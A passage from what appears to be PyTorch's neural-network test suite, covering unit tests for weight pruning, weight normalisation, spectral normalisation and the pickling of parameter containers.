expected_mask = torch.tensor([[0, 1, 1, 0], [0, 1, 0, 1]])
computed_mask = container.compute_mask(t, default_mask)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected_mask, computed_mask)
def test_l1_unstructured_pruning(self):
r"""Test that l1 unstructured pruning actually removes the lowest
entries by l1 norm (by hand). It also checks that applying l1
unstructured pruning more than once respects the previous mask.
"""
m = nn.Linear(4, 2)
# modify its weight matrix by hand
m.weight = torch.nn.Parameter(
torch.tensor(
[[1, 2, 3, 4], [-4, -3, -2, -1]], dtype=torch.float32
)
)
prune.l1_unstructured(m, 'weight', amount=2)
expected_weight = torch.tensor([[0, 2, 3, 4], [-4, -3, -2, 0]],
dtype=m.weight.dtype)
self.assertEqual(expected_weight, m.weight)
# check that pruning again removes the next two smallest entries
prune.l1_unstructured(m, 'weight', amount=2)
expected_weight = torch.tensor([[0, 0, 3, 4], [-4, -3, 0, 0]],
dtype=m.weight.dtype)
self.assertEqual(expected_weight, m.weight)
def test_l1_unstructured_pruning_with_importance_scores(self):
r"""Test that l1 unstructured pruning actually removes the lowest
entries of importance scores and not the parameter by l1 norm (by hand).
It also checks that applying l1 unstructured pruning more than once
respects the previous mask.
"""
m = nn.Linear(4, 2)
# modify its weight matrix by hand
m.weight = torch.nn.Parameter(
torch.tensor(
[[1, 2, 3, 4], [-4, -3, -2, -1]], dtype=torch.float32
)
)
importance_scores = torch.tensor(
[[4, 2, 1, 3], [-3, -1, -2, -4]], dtype=torch.float32
)
prune.l1_unstructured(m, 'weight', amount=2, importance_scores=importance_scores)
expected_weight = torch.tensor([[1, 2, 0, 4], [-4, 0, -2, -1]],
dtype=m.weight.dtype)
self.assertEqual(expected_weight, m.weight)
# check that pruning again removes two entries of m.weight that are colocated with
# the next two smallest absolute values of importance scores.
prune.l1_unstructured(m, 'weight', amount=2, importance_scores=importance_scores)
expected_weight = torch.tensor([[1, 0, 0, 4], [-4, 0, 0, -1]],
dtype=m.weight.dtype)
self.assertEqual(expected_weight, m.weight)
def test_unstructured_pruning_same_magnitude(self):
r"""Since it may happen that the tensor to prune has entries with the
same exact magnitude, it is important to check that pruning happens
consistenly based on the bottom % of weights, and not by threshold,
which would instead kill off *all* units with magnitude = threshold.
"""
AMOUNT = 0.2
p = prune.L1Unstructured(amount=AMOUNT)
# create a random tensors with entries in {-2, 0, 2}
t = 2 * torch.randint(low=-1, high=2, size=(10, 7))
nparams_toprune = prune._compute_nparams_toprune(AMOUNT, t.nelement())
computed_mask = p.compute_mask(t, default_mask=torch.ones_like(t))
nparams_pruned = torch.sum(computed_mask == 0)
self.assertEqual(nparams_toprune, nparams_pruned)
def test_random_structured_pruning_amount(self):
AMOUNT = 0.6
AXIS = 2
p = prune.RandomStructured(amount=AMOUNT, dim=AXIS)
t = 2 * torch.randint(low=-1, high=2, size=(5, 4, 2)).to(
dtype=torch.float32
)
nparams_toprune = prune._compute_nparams_toprune(AMOUNT, t.shape[AXIS])
computed_mask = p.compute_mask(t, default_mask=torch.ones_like(t))
# check that 1 column is fully prune, the others are left untouched
remaining_axes = [_ for _ in range(len(t.shape)) if _ != AXIS]
per_column_sums = sorted(
torch.sum(computed_mask == 0, axis=remaining_axes)
)
assert per_column_sums == [0, 20]
def test_ln_structured_pruning(self):
r"""Check Ln structured pruning by hand.
"""
m = nn.Conv2d(3, 1, 2)
m.weight.data = torch.tensor(
[[[[1., 2.], [1., 2.5]],
[[0.5, 1.], [0.1, 0.1]],
[[-3., -5.], [0.1, -1.]]]]
)
# expected effect of pruning 1 of the 3 channels by L2-norm
expected_mask_axis1 = torch.ones_like(m.weight)
expected_mask_axis1[:, 1] = 0.
prune.ln_structured(m, 'weight', amount=1, n=2, dim=1)
self.assertEqual(expected_mask_axis1, m.weight_mask)
# expected effect of pruning 1 of the 2 columns along axis -1 by L1-norm
expected_mask_axis3 = expected_mask_axis1
expected_mask_axis3[:, :, :, 0] = 0.
prune.ln_structured(m, 'weight', amount=1, n=1, dim=-1)
self.assertEqual(expected_mask_axis3, m.weight_mask)
def test_ln_structured_pruning_importance_scores(self):
r"""Check Ln structured pruning by hand.
"""
m = nn.Conv2d(3, 1, 2)
m.weight.data = torch.tensor(
[[[[1., 2.], [1., 2.5]],
[[0.5, 1.], [0.1, 0.1]],
[[-3., -5.], [0.1, -1.]]]]
)
importance_scores = torch.tensor(
[[[[10., 1.], [10., 1.]],
[[30., 3.], [30., 3.]],
[[-20., -2.], [-20., -2.]]]]
)
# expected effect of pruning 1 of the 3 channels by L2-norm
expected_mask_axis1 = torch.ones_like(m.weight)
expected_mask_axis1[:, 0] = 0.
prune.ln_structured(m, 'weight', amount=1, n=2, dim=1, importance_scores=importance_scores)
self.assertEqual(expected_mask_axis1, m.weight_mask)
# expected effect of pruning 1 of the 2 columns along axis -1 by L1-norm
expected_mask_axis3 = expected_mask_axis1
expected_mask_axis3[:, :, :, 1] = 0.
prune.ln_structured(m, 'weight', amount=1, n=1, dim=-1, importance_scores=importance_scores)
self.assertEqual(expected_mask_axis3, m.weight_mask)
def test_remove_pruning(self):
r"""`prune.remove` removes the hook and the reparametrization
and makes the pruning final in the original parameter.
"""
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
# first prune
prune.random_unstructured(m, name, amount=0.5)
self.assertIn(name + "_orig", dict(m.named_parameters()))
self.assertIn(name + "_mask", dict(m.named_buffers()))
self.assertNotIn(name, dict(m.named_parameters()))
self.assertTrue(hasattr(m, name))
pruned_t = getattr(m, name)
# then remove pruning
prune.remove(m, name)
self.assertIn(name, dict(m.named_parameters()))
self.assertNotIn(name + "_orig", dict(m.named_parameters()))
self.assertNotIn(name + "_mask", dict(m.named_buffers()))
final_t = getattr(m, name)
self.assertEqual(pruned_t, final_t)
def test_remove_pruning_exception(self):
r"""Removing from an unpruned tensor throws an assertion error
"""
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
# check that the module isn't pruned
self.assertFalse(prune.is_pruned(m))
# since it isn't pruned, pruning can't be removed from it
with self.assertRaises(ValueError):
prune.remove(m, name)
def test_global_pruning(self):
r"""Test that global l1 unstructured pruning over 2 parameters removes
the `amount=4` smallest global weights across the 2 parameters.
"""
m = nn.Linear(4, 2)
n = nn.Linear(3, 1)
# modify the weight matrices by hand
m.weight = torch.nn.Parameter(
torch.tensor([[1, 2, 3, 4], [-4, -3, -2, -1]]).to(
dtype=torch.float32)
)
n.weight = torch.nn.Parameter(
torch.tensor([[0, 0.1, -2]]).to(
dtype=torch.float32)
)
params_to_prune = (
(m, 'weight'),
(n, 'weight'),
)
# prune the 4 smallest weights globally by L1 magnitude
prune.global_unstructured(
params_to_prune,
pruning_method=prune.L1Unstructured,
amount=4
)
expected_mweight = torch.tensor([[0, 2, 3, 4], [-4, -3, -2, 0]],
dtype=m.weight.dtype)
self.assertEqual(expected_mweight, m.weight)
expected_nweight = torch.tensor([[0, 0, -2]]).to(dtype=n.weight.dtype)
self.assertEqual(expected_nweight, n.weight)
def test_global_pruning_importance_scores(self):
r"""Test that global l1 unstructured pruning over 2 parameters removes
the `amount=4` smallest global weights across the 2 parameters.
"""
m = nn.Linear(4, 2)
n = nn.Linear(3, 1)
# modify the weight matrices by hand
m.weight = torch.nn.Parameter(
torch.tensor([[1, 2, 3, 4], [-4, -3, -2, -1]]).to(
dtype=torch.float32)
)
m_importance_scores = torch.tensor(
[[4, 2, 1, 3], [-3, -1, -2, -4]], dtype=torch.float32
)
n.weight = torch.nn.Parameter(
torch.tensor([[0, 0.1, -2]]).to(
dtype=torch.float32)
)
n_importance_scores = torch.tensor([[0, 10., -0.2]]).to(dtype=torch.float32)
params_to_prune = (
(m, 'weight'),
(n, 'weight'),
)
importance_scores = {
(m, 'weight'): m_importance_scores,
(n, 'weight'): n_importance_scores,
}
# prune the 4 smallest weights globally by L1 magnitude
prune.global_unstructured(
params_to_prune,
pruning_method=prune.L1Unstructured,
amount=4,
importance_scores=importance_scores,
)
expected_m_weight = torch.tensor([[1, 2, 0, 4], [-4, 0, -2, -1]],
dtype=m.weight.dtype)
self.assertEqual(expected_m_weight, m.weight)
expected_n_weight = torch.tensor([[0, 0.1, 0]]).to(dtype=n.weight.dtype)
self.assertEqual(expected_n_weight, n.weight)
def test_custom_from_mask_pruning(self):
r"""Test that the CustomFromMask is capable of receiving
as input at instantiation time a custom mask, and combining it with
the previous default mask to generate the correct final mask.
"""
# new mask
mask = torch.tensor([[0, 1, 1, 0], [0, 0, 1, 1]])
# old mask
default_mask = torch.tensor([[0, 0, 0, 0], [1, 1, 1, 1]])
# some tensor (not actually used)
t = torch.rand_like(mask.to(dtype=torch.float32))
p = prune.CustomFromMask(mask=mask)
computed_mask = p.compute_mask(t, default_mask)
expected_mask = torch.tensor([[0, 0, 0, 0], [0, 0, 1, 1]]).to(
dtype=t.dtype
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(computed_mask, expected_mask)
def test_pruning_rollback(self):
r"""Test that if something fails when the we try to compute the mask,
then the model isn't left in some intermediate half-pruned state.
The try/except statement in `apply` should handle rolling back
to the previous state before pruning began.
"""
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
with mock.patch(
"torch.nn.utils.prune.L1Unstructured.compute_mask"
) as compute_mask:
compute_mask.side_effect = Exception('HA!')
with self.assertRaises(Exception):
prune.l1_unstructured(m, name=name, amount=0.9)
self.assertTrue(
name in dict(m.named_parameters())
)
self.assertFalse(
name + '_mask' in dict(m.named_buffers())
)
self.assertFalse(
name + '_orig' in dict(m.named_parameters())
)
def test_pruning_serialization_model(self):
# create a model
model = torch.nn.Sequential(
torch.nn.Linear(10, 10),
torch.nn.ReLU(),
torch.nn.Linear(10, 1),
)
# check that everything looks normal before pruning
self.assertNotIn('0.weight_orig', model.state_dict())
self.assertNotIn('0.weight_mask', model.state_dict())
self.assertIn('0.weight', model.state_dict())
# prune one of its parameters
prune.l1_unstructured(module=model[0], name='weight', amount=0.9)
# check that the original weight and the new mask are present
self.assertIn('0.weight_orig', model.state_dict())
self.assertIn('0.weight_mask', model.state_dict())
self.assertNotIn('0.weight', model.state_dict())
self.assertTrue(hasattr(model[0], 'weight'))
pruned_weight = model[0].weight
with TemporaryFileName() as fname:
torch.save(model, fname)
new_model = torch.load(fname)
# check that the original weight and the new mask are present
self.assertIn('0.weight_orig', new_model.state_dict())
self.assertIn('0.weight_mask', new_model.state_dict())
self.assertNotIn('0.weight', new_model.state_dict())
self.assertTrue(hasattr(new_model[0], 'weight'))
self.assertEqual(pruned_weight, new_model[0].weight)
def test_pruning_serialization_state_dict(self):
# create a model
model = torch.nn.Sequential(
torch.nn.Linear(10, 10),
torch.nn.ReLU(),
torch.nn.Linear(10, 1),
)
# check that everything looks normal before pruning
self.assertNotIn('0.weight_orig', model.state_dict())
self.assertNotIn('0.weight_mask', model.state_dict())
self.assertIn('0.weight', model.state_dict())
# prune one of its parameters
prune.l1_unstructured(module=model[0], name='weight', amount=0.9)
# check that the original weight and the new mask are present
self.assertIn('0.weight_orig', model.state_dict())
self.assertIn('0.weight_mask', model.state_dict())
self.assertNotIn('0.weight', model.state_dict())
self.assertTrue(hasattr(model[0], 'weight'))
pruned_weight = model[0].weight
# make pruning permanent and restore parameter names as in base
# architecture
prune.remove(module=model[0], name='weight')
# check that the original weight and the new mask are no longer present
self.assertNotIn('0.weight_orig', model.state_dict())
self.assertNotIn('0.weight_mask', model.state_dict())
self.assertIn('0.weight', model.state_dict())
# save the state dict of model and reload it into new_model
new_model = torch.nn.Sequential(
torch.nn.Linear(10, 10),
torch.nn.ReLU(),
torch.nn.Linear(10, 1),
)
with TemporaryFileName() as fname:
torch.save(model.state_dict(), fname)
new_model.load_state_dict(torch.load(fname))
# check that the original weight and the new mask are not present in
# new_model either.
self.assertNotIn('0.weight_orig', new_model.state_dict())
self.assertNotIn('0.weight_mask', new_model.state_dict())
self.assertIn('0.weight', new_model.state_dict())
self.assertEqual(pruned_weight, new_model[0].weight)
def test_prune(self):
# create a new pruning method
p = prune.L1Unstructured(amount=2)
# create tensor to be pruned
t = torch.tensor([[1, 2, 3, 4], [5, 6, 7, 8]]).to(dtype=torch.float32)
# create prior mask by hand
default_mask = torch.tensor([[1, 1, 1, 0], [1, 1, 0, 1]])
# since we are pruning the two lowest magnitude units, the outcome of
# the calculation should be this:
expected_mask = torch.tensor([[0, 0, 1, 0], [1, 1, 0, 1]])
pruned_tensor = p.prune(t, default_mask)
self.assertEqual(t * expected_mask, pruned_tensor)
def test_prune_importance_scores(self):
# create a new pruning method
p = prune.L1Unstructured(amount=2)
# create tensor to be pruned
t = torch.tensor([[1, 2, 3, 4], [5, 6, 7, 8]]).to(dtype=torch.float32)
importance_scores = torch.tensor(
[[1, 2, 3, 4], [1.5, 1.6, 1.7, 1.8]]
).to(dtype=torch.float32)
# create prior mask by hand
default_mask = torch.tensor([[1, 1, 1, 0], [1, 1, 0, 1]])
# since we are pruning the two lowest magnitude units, the outcome of
# the calculation should be this:
expected_mask = torch.tensor([[0, 1, 1, 0], [0, 1, 0, 1]])
pruned_tensor = p.prune(t, default_mask, importance_scores=importance_scores)
self.assertEqual(t * expected_mask, pruned_tensor)
def test_prune_importance_scores_mimic_default(self):
# create a new pruning method
p = prune.L1Unstructured(amount=2)
# create tensor to be pruned
t = torch.tensor([[1, 2, 3, 4], [5, 6, 7, 8]]).to(dtype=torch.float32)
# create prior mask by hand
default_mask = torch.tensor([[1, 1, 1, 0], [1, 1, 0, 1]])
# since we are pruning the two lowest magnitude units, the outcome of
# the calculation should be this:
expected_mask = torch.tensor([[0, 0, 1, 0], [1, 1, 0, 1]])
pruned_tensor_without_importance_scores = p.prune(t, default_mask)
pruned_tensor_with_importance_scores = p.prune(t, default_mask, importance_scores=t)
self.assertEqual(pruned_tensor_without_importance_scores, pruned_tensor_with_importance_scores)
self.assertEqual(t * expected_mask, pruned_tensor_without_importance_scores)
def test_rnn_pruning(self):
l = torch.nn.LSTM(32, 32)
# This Module has 4 parameters called:
# 'weight_ih_l0', 'weight_hh_l0', 'bias_ih_l0', 'bias_hh_l0'
# Pruning one of them causes one of the weights to become a tensor
prune.l1_unstructured(l, 'weight_ih_l0', 0.5)
assert (
sum([isinstance(p, torch.nn.Parameter) for p in l._flat_weights])
== 3
)
# Removing the pruning reparametrization restores the Parameter
prune.remove(l, 'weight_ih_l0')
assert (
sum([isinstance(p, torch.nn.Parameter) for p in l._flat_weights])
== 4
)
# Make sure that, upon removal of the reparametrization, the
# `._parameters` and `.named_parameters` contain the right params.
# Specifically, the original weight ('weight_ih_l0') should be placed
# back in the parameters, while the reparametrization component
# ('weight_ih_l0_orig') should be removed.
assert 'weight_ih_l0' in l._parameters
assert l._parameters['weight_ih_l0'] is not None
assert 'weight_ih_l0_orig' not in l._parameters
assert 'weight_ih_l0' in dict(l.named_parameters())
assert dict(l.named_parameters())['weight_ih_l0'] is not None
assert 'weight_ih_l0_orig' not in dict(l.named_parameters())
def test_rnn_weight_norm(self):
def check_weight_norm(l, name, num_params):
# This Module has 4 or 5 parameters called:
# 'weight_ih_l0', 'weight_hh_l0', 'bias_ih_l0', 'bias_hh_l0', weight_hr_l0
# Applying weight norm on one of them causes it to become a tensor
l = torch.nn.utils.weight_norm(l, name=name)
self.assertEqual(
sum([isinstance(p, torch.nn.Parameter) for p in l._flat_weights]),
num_params - 1,
)
# Removing the weight norm reparametrization restores the Parameter
l = torch.nn.utils.remove_weight_norm(l, name=name)
self.assertEqual(
sum([isinstance(p, torch.nn.Parameter) for p in l._flat_weights]),
num_params,
)
# Make sure that, upon removal of the reparametrization, the
# `._parameters` and `.named_parameters` contain the right params.
# Specifically, the original weight ('weight_ih_l0') should be placed
# back in the parameters, while the reparametrization components
# ('weight_ih_l0_v' and 'weight_ih_l0_g') should be removed.
self.assertTrue(name in l._parameters)
self.assertIsNotNone(l._parameters[name])
self.assertTrue(name + '_v' not in l._parameters)
self.assertTrue(name + '_g' not in l._parameters)
self.assertTrue(name in dict(l.named_parameters()))
self.assertIsNotNone(dict(l.named_parameters())[name])
self.assertTrue(name + '_v' not in dict(l.named_parameters()))
self.assertTrue(name + '_g' not in dict(l.named_parameters()))
check_weight_norm(torch.nn.LSTM(32, 32), 'weight_ih_l0', 4)
check_weight_norm(torch.nn.LSTM(32, 32, proj_size=16), 'weight_hr_l0', 5)
def test_weight_norm(self):
input = torch.randn(3, 5)
m = nn.Linear(5, 7)
expected_output = m(input)
# add weight normalization
m = torch.nn.utils.weight_norm(m)
self.assertEqual(m.weight_v.size(), m.weight.size())
self.assertEqual(m.weight_g.size(), (7, 1))
self.assertEqual(m(input), expected_output)
# remove weight norm
m = torch.nn.utils.remove_weight_norm(m)
self.assertFalse(hasattr(m, 'weight_g'))
self.assertFalse(hasattr(m, 'weight_v'))
self.assertEqual(m(input), expected_output)
# test with dim=1
m = torch.nn.utils.weight_norm(m, dim=1)
self.assertEqual(m.weight_v.size(), m.weight.size())
self.assertEqual(m.weight_g.size(), (1, 5))
self.assertEqual(m(input), expected_output)
# test with dim=None
m = nn.Linear(5, 7)
expected_output = m(input)
m = torch.nn.utils.weight_norm(m, dim=None)
self.assertEqual(m(input), expected_output)
with self.assertRaisesRegex(RuntimeError, 'register two weight_norm hooks'):
m = torch.nn.utils.weight_norm(m)
m = torch.nn.utils.weight_norm(m)
def test_parameterlistdict_setting_attributes(self):
with warnings.catch_warnings(record=True) as w:
mod = nn.ParameterList(map(nn.Parameter, [torch.rand(2), torch.rand(2)]))
self.assertTrue(len(w) == 0)
with warnings.catch_warnings(record=True) as w:
mod.train()
mod.eval()
self.assertTrue(len(w) == 0)
with self.assertWarnsRegex(UserWarning,
r"Setting attributes on ParameterList is not supported"):
torch.nn.utils.weight_norm(mod, "0")
with warnings.catch_warnings(record=True) as w:
mod = nn.ParameterDict({"a": nn.Parameter(torch.rand(2)), "b": nn.Parameter(torch.rand(2))})
self.assertTrue(len(w) == 0)
with warnings.catch_warnings(record=True) as w:
mod.train()
mod.eval()
self.assertTrue(len(w) == 0)
with self.assertWarnsRegex(UserWarning,
r"Setting attributes on ParameterDict is not supported"):
torch.nn.utils.weight_norm(mod, "b")
def test_parameterlistdict_pickle(self):
m = nn.ParameterList(map(nn.Parameter, [torch.rand(2), torch.rand(2)]))
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
m = nn.ParameterList(map(nn.Parameter, [torch.rand(2), torch.rand(2)]))
del m._initialized
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
# Test whether loading from older checkpoints works without triggering warnings
m = nn.ParameterList(map(nn.Parameter, [torch.rand(2), torch.rand(2)]))
del m._forward_pre_hooks, m._state_dict_hooks, m._load_state_dict_pre_hooks, m._non_persistent_buffers_set
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
m = nn.ParameterDict({"a": nn.Parameter(torch.rand(2)), "b": nn.Parameter(torch.rand(2))})
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
m = nn.ParameterDict({"a": nn.Parameter(torch.rand(2)), "b": nn.Parameter(torch.rand(2))})
del m._initialized
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
# Test whether loading from older checkpoints works without triggering warnings
m = nn.ParameterDict({"a": nn.Parameter(torch.rand(2)), "b": nn.Parameter(torch.rand(2))})
del m._forward_pre_hooks, m._state_dict_hooks, m._load_state_dict_pre_hooks, m._non_persistent_buffers_set
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
def test_weight_norm_pickle(self):
m = torch.nn.utils.weight_norm(nn.Linear(5, 7))
m = pickle.loads(pickle.dumps(m))
self.assertIsInstance(m, nn.Linear)
def test_spectral_norm(self):
input = torch.randn(3, 5)
m = nn.Linear(5, 7)
m = torch.nn.utils.spectral_norm(m)
self.assertEqual(m.weight_u.size(), torch.Size([m.weight.size(0)]))
# weight_orig should be trainable
self.assertTrue(hasattr(m, 'weight_orig'))
self.assertTrue('weight_orig' in m._parameters)
# weight_u should be just a reused buffer
self.assertTrue(hasattr(m, 'weight_u'))
self.assertTrue('weight_u' in m._buffers)
self.assertTrue('weight_v' in m._buffers)
# weight should be a plain attribute, not counted as a buffer or a param
self.assertFalse('weight' in m._buffers)
self.assertFalse('weight' in m._parameters)
# it should also be sharing storage as `weight_orig`
self.assertEqual(m.weight_orig.storage(), m.weight.storage())
self.assertEqual(m.weight_orig.size(), m.weight.size())
self.assertEqual(m.weight_orig.stride(), m.weight.stride())
m = torch.nn.utils.remove_spectral_norm(m)
self.assertFalse(hasattr(m, 'weight_orig'))
self.assertFalse(hasattr(m, 'weight_u'))
# weight should be converted back as a parameter
self.assertTrue(hasattr(m, 'weight'))
self.assertTrue('weight' in m._parameters)
with self.assertRaisesRegex(RuntimeError, 'register two spectral_norm hooks'):
m = torch.nn.utils.spectral_norm(m)
m = torch.nn.utils.spectral_norm(m)
# test correctness in training/eval modes and cpu/multi-gpu settings
for apply_dp in (True, False):
if apply_dp:
if not TEST_MULTIGPU:
continue
device = torch.device('cuda:0')
def maybe_wrap(m):
return torch.nn.DataParallel(m, [0, 1])
else:
device = torch.device('cpu')
def maybe_wrap(m):
return m
for requires_grad in (True, False):
m = nn.Linear(3, 4).to(device)
m.weight.requires_grad_(requires_grad)
m = torch.nn.utils.spectral_norm(m)
wrapped_m = maybe_wrap(m)
self.assertTrue(hasattr(m, 'weight_u'))
u0 = m.weight_u.clone()
v0 = m.weight_v.clone()
# TEST TRAINING BEHAVIOR
# assert that u and v are updated
input = torch.randn(2, 3, device=device)
out = wrapped_m(input)
self.assertNotEqual(u0, m.weight_u)
self.assertNotEqual(v0, m.weight_v)
# assert that backprop reaches weight_orig
# can't use gradcheck because the function changes as we
# activate through it in training mode
if requires_grad:
torch.autograd.grad(out.sum(), m.weight_orig)
# test backward works with multiple forwards
# it uses training mode so we need to reset `u` and `v` vectors
# to same value at beginning for finite difference test to pass
saved_u = m.weight_u.clone()
saved_v = m.weight_v.clone()
def fn(input):
m.weight_u.data.copy_(saved_u)
m.weight_v.data.copy_(saved_v)
out0 = wrapped_m(input)
out1 = wrapped_m(input)
return out0 + out1
gradcheck(fn, (input.clone().requires_grad_(),), check_batched_grad=False)
# test removing
pre_remove_out = wrapped_m(input)
m = torch.nn.utils.remove_spectral_norm(m)
self.assertEqual(wrapped_m(input), pre_remove_out)
m = torch.nn.utils.spectral_norm(m)
for _ in range(3):
pre_remove_out = wrapped_m(input)
m = torch.nn.utils.remove_spectral_norm(m)
self.assertEqual(wrapped_m(input), pre_remove_out)
# TEST EVAL BEHAVIOR
m = torch.nn.utils.spectral_norm(m)
wrapped_m(input)
last_train_out = wrapped_m(input)
last_train_u = m.weight_u.clone()
last_train_v = m.weight_v.clone()
wrapped_m.zero_grad()
wrapped_m.eval()
eval_out0 = wrapped_m(input)
# assert eval gives same result as last training iteration
self.assertEqual(eval_out0, last_train_out)
# assert doing more iteartion in eval don't change things
self.assertEqual(eval_out0, wrapped_m(input))
self.assertEqual(last_train_u, m.weight_u)
self.assertEqual(last_train_v, m.weight_v)
# FIXME: the code below is flaky when executed with DataParallel
# see https://github.com/pytorch/pytorch/issues/13818
if apply_dp:
continue
# test backward works with multiple forwards in mixed training
# and eval modes
# it uses training mode so we need to reset `u` and `v` vectors
# to same value at beginning for finite difference test to pass
saved_u = m.weight_u.clone()
saved_v = m.weight_v.clone()
def fn(input):
m.weight_u.data.copy_(saved_u)
m.weight_v.data.copy_(saved_v)
wrapped_m.train()
out0 = wrapped_m(input)
wrapped_m.eval()
out1 = wrapped_m(input)
wrapped_m.train()
out2 = wrapped_m(input)
wrapped_m.eval()
out3 = wrapped_m(input)
return out0 + out1 + out2 + out3
gradcheck(fn, (input.clone().requires_grad_(),))
# assert that backprop reaches weight_orig in eval
if requires_grad:
def fn(weight):
return wrapped_m(input)
gradcheck(fn, (m.weight_orig,))
def test_new_spectral_norm(self):
input = torch.randn(3, 5)
m = nn.Linear(5, 7)
m = torch.nn.utils.parametrizations.spectral_norm(m)
spectral_norm_m = m.parametrizations.weight[0]
self.assertEqual(spectral_norm_m._u.size(), torch.Size([m.weight.size(0)]))
# .parametrizations.weight.original should be trainable
self.assertTrue(hasattr(m.parametrizations.weight, 'original'))
self.assertTrue('original' in m.parametrizations.weight._parameters)
# u should be just a reused buffer
self.assertTrue(hasattr(spectral_norm_m, '_u'))
self.assertTrue('_u' in spectral_norm_m._buffers)
self.assertTrue('_v' in spectral_norm_m._buffers)
# weight should be a plain attribute, not counted as a buffer or a param
self.assertIsNotNone(m.weight)
self.assertFalse('weight' in m._buffers)
self.assertFalse('weight' in m._parameters)
# it should also be sharing storage as `weight_orig`
# self.assertEqual(m.parametrizations.weight.original.storage(), m.weight.storage())
self.assertEqual(m.parametrizations.weight.original.size(), m.weight.size())
self.assertEqual(m.parametrizations.weight.original.stride(), m.weight.stride())
m = torch.nn.utils.parametrize.remove_parametrizations(m, 'weight')
# spectral_norm is the only parametrization
self.assertFalse(hasattr(m, 'parametrizations'))
self.assertTrue('weight' in m._parameters)
# We can register spectral_norm multiple times on the same parameter
# and on multiple parameters in the same module
m = torch.nn.utils.parametrizations.spectral_norm(m, 'weight')
m = torch.nn.utils.parametrizations.spectral_norm(m, 'weight')
m = torch.nn.utils.parametrizations.spectral_norm(m, 'bias')
# If we remove the parametrization on bias, weight is still parametrized
# Removing a parametrization runs forward in eval mode if leave_parametrized=True
m = torch.nn.utils.parametrize.remove_parametrizations(m, 'bias')
self.assertTrue('bias' in m._parameters)
self.assertTrue(hasattr(m, 'parametrizations'))
self.assertFalse('weight' in m._parameters)
m = torch.nn.utils.parametrize.remove_parametrizations(m, 'weight')
# Neither weight and bias are parametrized
self.assertFalse(hasattr(m, 'parametrizations'))
self.assertTrue('weight' in m._parameters)
self.assertFalse(torch.nn.utils.parametrize.is_parametrized(m))
# test correctness in training/eval modes and cpu/multi-gpu settings
for apply_dp in (True, False):
if apply_dp:
if not TEST_MULTIGPU:
continue
device = torch.device('cuda:0')
def maybe_wrap(m):
return torch.nn.DataParallel(m, [0, 1])
else:
device = torch.device('cpu')
def maybe_wrap(m):
return m
for requires_grad in (True, False):
def get_modules():
m = nn.Linear(3, 4).to(device)
m.weight.requires_grad_(requires_grad)
m = torch.nn.utils.parametrizations.spectral_norm(m)
wrapped_m = maybe_wrap(m)
spectral_norm_m = m.parametrizations.weight[0]
return m, wrapped_m, spectral_norm_m
input = torch.randn(2, 3, device=device)
m, wrapped_m, spectral_norm_m = get_modules()
self.assertTrue(hasattr(spectral_norm_m, '_u'))
u0 = spectral_norm_m._u.clone()
v0 = spectral_norm_m._v.clone()
# TEST TRAINING BEHAVIOR
# We perform GD first to modify the initial matrix
opt = torch.optim.SGD(wrapped_m.parameters(), lr=0.1)
opt.zero_grad()
wrapped_m(input).sum().backward()
opt.step()
out = wrapped_m(input)
if requires_grad:
# run forward again and assert that u and v are updated
self.assertNotEqual(u0, spectral_norm_m._u)
self.assertNotEqual(v0, spectral_norm_m._v)
# assert that backprop reaches original weight
# can't use gradcheck because the function changes as we
# activate through it in training mode
if requires_grad:
torch.autograd.grad(out.sum(), m.parametrizations.weight.original)
# test backward works with multiple forwards
# it uses training mode so we need to reset `u` and `v` vectors
# to same value at beginning for finite difference test to pass
saved_u = spectral_norm_m._u.clone()
saved_v = spectral_norm_m._v.clone()
def fn(input):
spectral_norm_m._u.data.copy_(saved_u)
spectral_norm_m._v.data.copy_(saved_v)
out0 = wrapped_m(input)
out1 = wrapped_m(input)
return out0 + out1
# Make sure we can compute gradients wrt to all the parameters in the case
# of double forward
fn(input.clone().requires_grad_()).sum().backward()
gradcheck(fn, (input.clone().requires_grad_(),), check_batched_grad=False)
# test removing
# spectral norm module needs to be in eval mode if we'd like to
# avoid doing another power iteration
m, wrapped_m, _ = get_modules()
pre_remove_out = wrapped_m(input)
m.eval()
m = torch.nn.utils.parametrize.remove_parametrizations(m, 'weight')
self.assertEqual(wrapped_m(input), pre_remove_out)
torch.nn.utils.parametrizations.spectral_norm(m)
for _ in range(3):
pre_remove_out = wrapped_m(input)
m.eval()
m = torch.nn.utils.parametrize.remove_parametrizations(m, 'weight')
self.assertEqual(wrapped_m(input), pre_remove_out)
# TEST EVAL BEHAVIOR
m, wrapped_m, spectral_norm_m = get_modules()
wrapped_m(input)
last_train_out = wrapped_m(input)
last_train_u = spectral_norm_m._u.clone()
last_train_v = spectral_norm_m._v.clone()
wrapped_m.zero_grad()
wrapped_m.eval()
eval_out0 = wrapped_m(input)
# assert eval gives same result as last training iteration
self.assertEqual(eval_out0, last_train_out)
# assert doing more iteartion in eval don't change things
self.assertEqual(eval_out0, wrapped_m(input))
self.assertEqual(last_train_u, spectral_norm_m._u)
self.assertEqual(last_train_v, spectral_norm_m._v)
# FIXME: the code below is flaky when executed with DataParallel
# see https://github.com/pytorch/pytorch/issues/13818
if apply_dp:
continue
# test backward works with multiple forwards in mixed training
# and eval modes
# it uses training mode so we need to reset `u` and `v` vectors
# to same value at beginning for finite difference test to pass
saved_u = spectral_norm_m._u.clone()
saved_v = spectral_norm_m._v.clone()
def fn(input):
spectral_norm_m._u.data.copy_(saved_u)
